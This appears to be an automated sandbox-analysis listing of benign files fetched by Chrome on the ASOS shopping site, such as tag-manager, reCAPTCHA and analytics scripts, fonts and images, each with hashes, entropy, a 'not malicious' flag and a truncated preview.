                                                                                                                                                                                                                                                                  Preview:div#actionbar .no-display{display:none!important}div#actionbar *{box-sizing:border-box;outline:0;-webkit-tap-highlight-color:transparent;user-select:none;-webkit-user-select:none}div#actionbar{background:#fff;position:fixed;bottom:10px;right:10px;border:solid 1px #dcdcde;border-radius:3px;opacity:.98;height:35px;margin:0;padding:0;box-sizing:border-box;line-height:1;z-index:50000;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen-Sans","Ubuntu","Cantarell","Helvetica Neue",sans-serif;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-o-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0);transform:translate3d(0,0,0);transition:all .2s ease-in-out;-webkit-backface-visibility:hidden;-webkit-perspective:1000;-webkit-tap-highlight-color:transparent;user-select:none;-webkit-user-select:none}div#actionbar.actnbr-hidden{-webkit-transform:translate3d(0,150px,0);-moz-transform:translate3d(0,150px,0);-o-transform:translate3d(0,150px,0);-ms-tran
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):3501
                                                                                                                                                                                                                                                                  Entropy (8bit):5.383873370647921
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:EI5cZUiKliCJ86U+QTEVWfeLwTauSEegdkZ5edOIC:EI5hiWNJ8kQTEVWfeUauRfdkZ5edO1
                                                                                                                                                                                                                                                                  MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                                                                                                  SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                                                                                                  SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                                                                                                  SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.googletagmanager.com/static/service_worker/4al0/sw_iframe.html?origin=https%3A%2F%2Fwww.asosglobal.com
                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (655), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):655
                                                                                                                                                                                                                                                                  Entropy (8bit):5.055936985169239
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:2QH2AlXI0Mh3ZoBe1+s+XEKz4tW3DRRTW3u3XDdI+u/obPqRT86f:2QH/wNZoTZXCyRRa3u3X5duQbPqRJf
                                                                                                                                                                                                                                                                  MD5:5048B7BF6F335C259CAE5D653D50726E
                                                                                                                                                                                                                                                                  SHA1:96F45044F726EEF7C8E7C7F21F6368BF23A2B3F0
                                                                                                                                                                                                                                                                  SHA-256:B6E4492D3B8358A81B80908B1F84E6BD2F64A7A46D48793AF99D27BF29F4C2E8
                                                                                                                                                                                                                                                                  SHA-512:8990F24D3989C392C00A4FC59D78945A401EB3295FC287A2C718323CC83E27B2D403E9E08162B2CEF4F5C944B31D3EEE98560ACBB7BC4DC58B70B72AA83A4311
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://s2.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1610363240i
                                                                                                                                                                                                                                                                  Preview:(function(){var e=window.WPGroHo||{};e.my_hash="";e.data={};e.renderers={};e.syncProfileData=function(a,r){if(!e.data[a]){e.data[a]={};var n=document.querySelectorAll("div.grofile-hash-map-"+a+" span");for(var t=0;t<n.length;t++){var o=n[t];e.data[a][o.className]=o.textContent}}e.appendProfileData(e.data[a],a,r)};e.appendProfileData=function(a,r,n){for(var t in a){if(typeof e.renderers[t]==="function"){return e.renderers[t](a[t],r,n,t)}var o=document.getElementById(n);if(o){var d=o.querySelector("h4");if(d){var i=document.createElement("p");i.className="grav-extra "+t;i.innerHTML=a[t];d.insertAdjacentElement("afterend",i)}}}};window.WPGroHo=e})();
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):78685
                                                                                                                                                                                                                                                                  Entropy (8bit):6.020288496082252
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:OfGNbFoZJSUYOOaLnAW8+IcTOIobkhXwW5vxM:mGRFauOxLA/+IcTOuXK
                                                                                                                                                                                                                                                                  MD5:47BEA70318B724B1A99A1D571FF58807
                                                                                                                                                                                                                                                                  SHA1:B66FFE704AD2FE84DA8211D6351727568FD68B78
                                                                                                                                                                                                                                                                  SHA-256:11A188A204934185AB5649A1F838FE771C3D84C928BC8286EF999FB5B8DEDA69
                                                                                                                                                                                                                                                                  SHA-512:7995460AB00A68E3433EA72F19FCB1BCD8485BF4CAF978FF5C47193F110899AA824AC4A697285E908A5F66C693604A0227E60B3D3D948115C4C3490022B82E3D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/styles__ltr.css
                                                                                                                                                                                                                                                                  Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAHq9SURBVHja7Z15fFTl9f/fd9ZM9n1PgCyEXSSRNYKCgAuiIipuVSuudavV1tq6W/WrtnWrrZbWDZUqUqUoCoIEQhBI2JesELKvM9mTWe7c3x83d5xAlkky8fv92ft5vfKC19znOWfuZ571POc5B1SoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKHifwGCRqsTNFrdj6VPq9XqtNofT9+wvutQyEyad8t9IaPPntFUd
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65468)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):411041
                                                                                                                                                                                                                                                                  Entropy (8bit):5.4978102551337
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:i77ivJMT/dwpHzKkrr28wIF41+HbzzVEAnLIcpXe2UmOmJzN6HyM:yw+2pukOFMH4IXe2S
                                                                                                                                                                                                                                                                  MD5:1293F68B6D7FAFE872CAB89205B32B23
                                                                                                                                                                                                                                                                  SHA1:9EE018E17198F1A7756EB268D81AA1C707BEED2A
                                                                                                                                                                                                                                                                  SHA-256:9876DD1B9851AE230ECF3E15D6C3B423EA2D259F5A490B55981FEF73A0EE9030
                                                                                                                                                                                                                                                                  SHA-512:6712643327683F8A20CE75B46388BD2487A1EAC2D0D21FEBDEA3B88704D0DB83650D5A8CA9622D80F543BF8DBE966B56E88A2BC3E3E49B9CA7584368F094F90B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:/*! For license information please see client.min.js.LICENSE.txt */.(function(){var __webpack_modules__={5251:function(n,t,e){var i;!function(r,o){"use strict";var a="function",u="undefined",c="object",s="string",f="model",l="name",d="type",v="vendor",h="version",p="architecture",g="console",m="mobile",_="tablet",w="smarttv",y="wearable",b="embedded",E="Amazon",I="Apple",A="ASUS",T="BlackBerry",S="Firefox",k="Google",R="Huawei",C="LG",N="Microsoft",D="Motorola",O="Opera",x="Samsung",M="Sharp",P="Sony",L="Xiaomi",U="Zebra",V="Facebook",F=function(n){for(var t={},e=0;e<n.length;e++)t[n[e].toUpperCase()]=n[e];return t},B=function(n,t){return typeof n===s&&-1!==z(t).indexOf(z(n))},z=function(n){return n.toLowerCase()},j=function(n,t){if(typeof n===s)return n=n.replace(/^\s\s*/,""),typeof t===u?n:n.substring(0,350)},G=function(n,t){for(var e,i,r,u,s,f,l=0;l<t.length&&!s;){var d=t[l],v=t[l+1];for(e=i=0;e<d.length&&!s&&d[e];)if(s=d[e++].exec(n))for(r=0;r<v.length;r++)f=s[++i],typeof(u=v[r])==
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):7585
                                                                                                                                                                                                                                                                  Entropy (8bit):5.010359710979666
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Y12RNgok7zqy/bDzp5LkuD8QAKnv+wrBANASYmharWsMx7lg9ruCnIz0byCvnHZj:nzvuUas5kWHaAobNVJR3jTPLW+F
                                                                                                                                                                                                                                                                  MD5:CEB4BD2950AE755CCCC74A30C4AE0AC3
                                                                                                                                                                                                                                                                  SHA1:75DAB7180DCF5A24E5106CA8F77163A44E45E204
                                                                                                                                                                                                                                                                  SHA-256:598E122FC428000F16BC116FE98849A510904B6F3A5152D740CA004DEB5E6E94
                                                                                                                                                                                                                                                                  SHA-512:1D602E1FE302BD684609CD227799ECCD7709707AC5E1463A5736584D45F79CE934B974078ED3DB5F87948F78B3F1856865193FF4064F88E2A227B075F551D6F9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:{"h.key":"KEKMC-5QPEH-Y5FHE-8AH54-JDSN3","h.d":"asos.com","h.t":1730229084904,"h.cr":"0e2fdf13037622f5d0066e4c51c1ac138b5be585-e6f7476a-c58388ad","session_id":"9bf299f4-fe84-41de-a11e-bde304d3203b","site_domain":"asos.com","beacon_url":"//0217991d.akstat.io/","autorun":true,"instrument_xhr":true,"strip_query_string":true,"beacon_interval":60,"BW":{"enabled":false},"RT":{"session_exp":1800},"ResourceTiming":{"enabled":true,"splitAtPath":true},"Continuity":{"enabled":true,"waitAfterOnload":2000},"PageParams":{"xhr":"match","pageGroups":[{"type":"Regexp","parameter1":".*/.*/cat/\\?","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/search($|/|\\?)","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/brand-error/","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/brand-unavailable/","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/prd/","parameter2":"PDP","on":["navigation"]},{"type":
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):374
                                                                                                                                                                                                                                                                  Entropy (8bit):4.0510364368274105
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:v4qoX0XB79i8eJOezXXhKvNsTX0XB79S66Oez114vN8K2GVgGgGVgAn:ANgBU8eJh0NIgB86jN8YVgGDVgAn
                                                                                                                                                                                                                                                                  MD5:BF5AA10EBDE60125A2179D960233FE37
                                                                                                                                                                                                                                                                  SHA1:F65FE06E09F0A755782A84514A2510038890D4D0
                                                                                                                                                                                                                                                                  SHA-256:A7B639B0B8FF4EF237034146CEB8D34300864969212FECD5019CBAEB37B611FC
                                                                                                                                                                                                                                                                  SHA-512:6C44ECDF2C324BB827A9C62D1D8535F3E0FB8311133691565B8040B0D32EA265EE802858F13862999B87000E7C5C571216DE6C20BADED9AC74761D40FBDE49CD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.asos.com/manifest.json
                                                                                                                                                                                                                                                                  Preview:{. "name": "",. "icons": [. {. "src": "/android-chrome-192x192.png",. "sizes": "192x192",. "type": "image/png". },. {. "src": "/android-chrome-512x512.png",. "sizes": "512x512",. "type": "image/png". }. ],. "theme_color": "#0E0F0F",. "background_color": "#0E0F0F".}
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (4450)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):4522
                                                                                                                                                                                                                                                                  Entropy (8bit):5.306364650524668
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:vSIm3eWWY4emHvJwe+QRQJCNuN2W2K2EXR5hDV2OmGi7kA2Wn6:vIgZhwepRQYgYlhEXR5hDVEGiF2Wn6
                                                                                                                                                                                                                                                                  MD5:3C8F93FEC24C564BD9DDFDA68827666A
                                                                                                                                                                                                                                                                  SHA1:968CA6A78637C83D539D5603BF8FDAFD72C1E4A6
                                                                                                                                                                                                                                                                  SHA-256:EE6F5A3E3C885FEDD52B015CAB0F1847A86805DCE43723C9F6550D98BC2FCA03
                                                                                                                                                                                                                                                                  SHA-512:4B07C8D575FCF286C734E85CF336821D1EECD2093838BB9394CF76B3CD7CD6811E75D79581ECBA80961A8AD605525123DC94CA859256CEF846F4EF1491F3B927
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://resources.asosservices.com/res/analytics/homepage.sitechrome.js
                                                                                                                                                                                                                                                                  Preview:// 1.0.572.require(["jquery"],function($){function onCarouselAction(){var overrides;void 0===window.analyticsCarouselAction&&(s=s_gi(s.account),(overrides={}).linkTrackVars=commons.setLinkTrackVars(["prop40"]),overrides.linkTrackEvents=commons.setLinkTrackEvents(["event120"]),s.prop40=(arguments[1].carouselType+"|"+arguments[1].componentName).toLowerCase(),s.events="event120",s.tl(!0,"o","homepage|"+arguments[1].context,overrides),window.analyticsCarouselAction=1)}var commons=new CommonAnalytics({"tracking.homePage.carouselAction":function(){},"tracking.homePage.pageLoad":function(){}});window.asos.eventBus.emit("analytics-ready");window.asos.eventBus.addListener("tracking.homePage.carouselAction",onCarouselAction),$(window).on("tracking.homePage.carouselAction",onCarouselAction),__trackingData={},window.asos&&window.asos.contentTargeting&&document.body.querySelectorAll("[data-targeted-content-item]").length?window.asos.contentTargeting.subscribe(function(data){__trackingData.targeting
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (701)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):558800
                                                                                                                                                                                                                                                                  Entropy (8bit):5.6661858145390775
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12288:HHe/N32Dr0RnSXaKyEtG76ZKj1wa89jzQoDjU3+VLs/k5lS64cflFT3O01d:eMapiBMKZxRflF3d
                                                                                                                                                                                                                                                                  MD5:88A5FED5C87B1D3704AB225CFBE7A130
                                                                                                                                                                                                                                                                  SHA1:D64243C18FBAA356E4ABAE8414CCC4772D64060B
                                                                                                                                                                                                                                                                  SHA-256:F8E5F5CE9FF44073CFF24BCD3D2B8AA4E67B67891B14FF929FE4743880FDF82E
                                                                                                                                                                                                                                                                  SHA-512:8B8D1C9F4C36FD2383C96D0D484A6692F70422934BCCD3DB1F0787E1B753F7D5A8F0C91934805C4D865AED3D4673FF478F0AE23746D0C0E005E60848543B3D33
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js
                                                                                                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var k=function(){return[function(n,S,D,d,Z,l,h,R,O){return(((n^53)&19)==((n&((((R=[34,2,46],n|72)==n&&(O=St(function(G,A,L){return L=(A=(G=function(f,H){return(f[(H=["replace","indexOf","trim"],H)[1]](d)!=-1&&(f=f.slice(f[H[1]](d))),f)[H[0]](/\s+/g,S)[H[0]](/\n/g,Z)[H[2]]()},G(Z+l)),G(Z+h)),A==L},D)),n)|56)==n&&(h=["https","",0],D=="*"?O="*":(d=g[R[2]](24,!0,h[1],new OI(D)),l=N[30](58,d,h[1]),Z=N[36](25,h[1],g[40](40,l,h[1]),v[21](R[1],1,S,D)),Z.D!=S||(Z.A==h[0]?E[30](90,h[R[1]],443,Z):Z.A=="http"&&.E[30](96,h[R[1]],80,Z)),O=Z.toString())),11))==n&&b.call(this,S),1)&&(O=x[42](16,C[42](44,v[R[0]](23,12),S),[u[20](3
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):4206
                                                                                                                                                                                                                                                                  Entropy (8bit):7.9017967994114535
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:yEJxog9X3l4Mk2ux6Clf5Jd3ohenPZGkm0oAOr27:y8xoK3p9u6Clf5X3keBvOry
                                                                                                                                                                                                                                                                  MD5:E9EE5AD25C6928A55574A42A3CE1FA01
                                                                                                                                                                                                                                                                  SHA1:00C9BC8C1DE93D4279CB25631F89E5D7B04480D7
                                                                                                                                                                                                                                                                  SHA-256:019EDFCFE79125D1CF41AE3AB7A269DAAE1E756EC27F375CB235EA1C49B0929A
                                                                                                                                                                                                                                                                  SHA-512:E417CEC635A95390D263EDB0DEB48E36BBFA83A917EAB70D31D22E29698EB0F9B9B6165D2474E90C15FE7106119D47D1611C2E343D016F704976F6F63EF3A77C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA5CRWb0pqYXQQK9znJ5KV0VwEOa4LwTb8cyN7pOwIZZ04W9ux6A5u-MAbH1xLyDQMREJb298rgjzqYg-SfwWz7xWuHpDGxazw8zRRljMsmI_2zKtxQ_m35rkCI5Lk7f5FhQABxvWvoIdrGF0A4ARXIg27QobrPOi2xAvxvGvMxG3zZi2Qucrr1lJTYtpc5XFS8wOT6E2kdH05v1_mpmO1RBCjs__A&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=70db3a36bb8782c5
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...1.M..@$..V5Y.6.......M.DO<..*...+.?*..q.P.&T....t.$.5..I8..2..>7.9$...-c..|.FO.... ..c,.n.9....n..$vo....^h..(.....N1....ev..e.3....H....V\0..@...+.M....9;.-.e..7..f.;FH.......[..nF8.=.I,.....Q>\..r..u...n.i..M.....Fr~......>...M6.-.d.....K8.:p+..es...}..........x@...z.N...w.h.Qe.\....}.2..T.3 ...n..y..3.aR*pi...5.....Y.iV..q.7pC).H./..(....... .8..<M..R{
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17577)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):17672
                                                                                                                                                                                                                                                                  Entropy (8bit):5.210199101660777
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:iwvGdN1cMU8QatLePlko998Vp3AIgujHrEDO11yy1plMW2IP4VldNr1:ZGSMU8qPlko998PQIg0HrEDM1yy1plRE
                                                                                                                                                                                                                                                                  MD5:34F15782047F9D678A947BF675E8A3D8
                                                                                                                                                                                                                                                                  SHA1:6034D6A3106350EEC176759ECF57C7E8551ADF3F
                                                                                                                                                                                                                                                                  SHA-256:0C8A9732467A1684679DE0BB5A979468FC31123212AC1F936F7F2CC653E90B29
                                                                                                                                                                                                                                                                  SHA-512:27DEACE81F42CA5B0EDE5A0EFB534D17B86A51730E6C8776B148CBD5759A5FAE158B6CDE1F04F373B5ED2BC7BCAACF17369BDD302D47F112ADBD5755CC58165B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/shared/require.7c30e08a.js
                                                                                                                                                                                                                                                                  Preview:/*! v2.2.0, license file: require.LICENSE.txt */.var requirejs,require,define;!function(global){var req,s,head,baseElement,dataMain,src,interactiveScript,currentlyAddingScript,mainScript,subPath,version="2.2.0",commentRegExp=/(\/\*([\s\S]*?)\*\/|([^:]|^)\/\/(.*)$)/gm,cjsRequireRegExp=/[^.]\s*require\s*\(\s*["']([^'"\s]+)["']\s*\)/g,jsSuffixRegExp=/\.js$/,currDirRegExp=/^\.\//,op=Object.prototype,ostring=op.toString,hasOwn=op.hasOwnProperty,isBrowser=!("undefined"==typeof window||"undefined"==typeof navigator||!window.document),isWebWorker=!isBrowser&&"undefined"!=typeof importScripts,readyRegExp=isBrowser&&"PLAYSTATION 3"===navigator.platform?/^complete$/:/^(complete|loaded)$/,defContextName="_",isOpera="undefined"!=typeof opera&&"[object Opera]"===opera.toString(),contexts={},cfg={},globalDefQueue=[],useInteractive=!1;function commentReplace(e,t,i,r){return r||""}function isFunction(e){return"[object Function]"===ostring.call(e)}function isArray(e){return"[object Array]"===ostring.cal
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 80284, version 1.590
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):80284
                                                                                                                                                                                                                                                                  Entropy (8bit):7.996820470704193
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:1536:pNWK9e/XWghzVGbm5mj9HWlfYoGqjzD+F9hT1b5bqMCAB1Rov6K1P:pgkefdsmUj+fYKKFnT1bxqMCAB1SNZ
                                                                                                                                                                                                                                                                  MD5:C928F3743528E38AB3E452F66DACDDA5
                                                                                                                                                                                                                                                                  SHA1:BCB91E0E5546FFCCAEAA67FCF6BBCFB71EC14CF4
                                                                                                                                                                                                                                                                  SHA-256:1074381C79236111C60C6FDA4FDF71B2B3780D22AA08500784678A2C958FE14F
                                                                                                                                                                                                                                                                  SHA-512:FF40B3FA0C009699EFCFB4B07765FA7AB8D3C2BA189BE5444B745F72DCF50A0EDFFD0E242D186E95C90AA4B49E2E701EA66E06B8D1CFDB39395919CE26A5468F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/fonts/futura-pt/bold.11074381.woff2
                                                                                                                                                                                                                                                                  Preview:wOF2......9........(..93...N.......................\.....r.`....$..a.....(..Q...X.6.$..8..<.. ..7..s..v[....b.n...e...J...L..P(u....u.r.j.h......:..A....@Y.d............w2..J.>K....7h!@..cm.u.A.<.y.!DJJ1G.....*.P......Q.D.56.Z:....TK..4.._.y.J.....N.v....:$O?B(..&...b..A}1.z.E.v8.8..v...0..I<yo.x.....,......[....Si.+.^.w^:A.4H.jI...y.......F.O.cY.jo.%..^z...Mb.....!{......[.LJ. {....JV.q..0P..L......dW.....?........t..`..=.+...O.o_Y..iM[..........J.......O..J..!....X...[. ...N^8.....cE55.I..rf.,.E...a....}..VU..-..#.....7..Sa._Oo..[V...'...C...d._..X.V...T..2T..Q......."2T.a...g8...4.. .o...z)W.....<.{w.....FF=..H.?Ewt-..~r...q..@H..j...&D.J).\...At.}d.... ~...........%....-.5FMJ.|.`.5h....h.......e%b~.j....[#$.lj0.l...1.GH./.%*"Q.T.6.,.a bQ.&..P.#_A.|.....{......).I.J.th.*..f..4.k@..zcw.6..L..(..'i.a.*.r..3.)T...*.T ..(4......m. T.].t."..&..V...R.%.4.Nv..O.....Yj<.2.@`j-..."_.'UD..H.......|D..t.....-}..A..t.I#..e......eN6K.X!.B..} .um..2U;..;w.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):3810
                                                                                                                                                                                                                                                                  Entropy (8bit):7.943543789912295
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:OIQMcJ3Snkq1Zx9/1YFKaFA1TapnwrSInCf51SG/:zQdikqPx9aHA1TapnwHnQr5
                                                                                                                                                                                                                                                                  MD5:B4A4AEEF41EE413911BDF53724431511
                                                                                                                                                                                                                                                                  SHA1:F84E97D881DD1D90C191103EA1715D5A646D319F
                                                                                                                                                                                                                                                                  SHA-256:3B672FA58CC2E0A0A21C7AEE6E5D8B9A3CB8BA2C7692BEFB7E69EC29F24B895F
                                                                                                                                                                                                                                                                  SHA-512:AE1BF7ABC4D1FC615191C2BEEAA63E3CD8DD100666D3BAE99CDA7F6F19AC473B2997C772D2BE0924707030A6269E6EE43284D47F9B2BE3986F99E8F3C3FA765B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/storesa/images/flags/gb.png
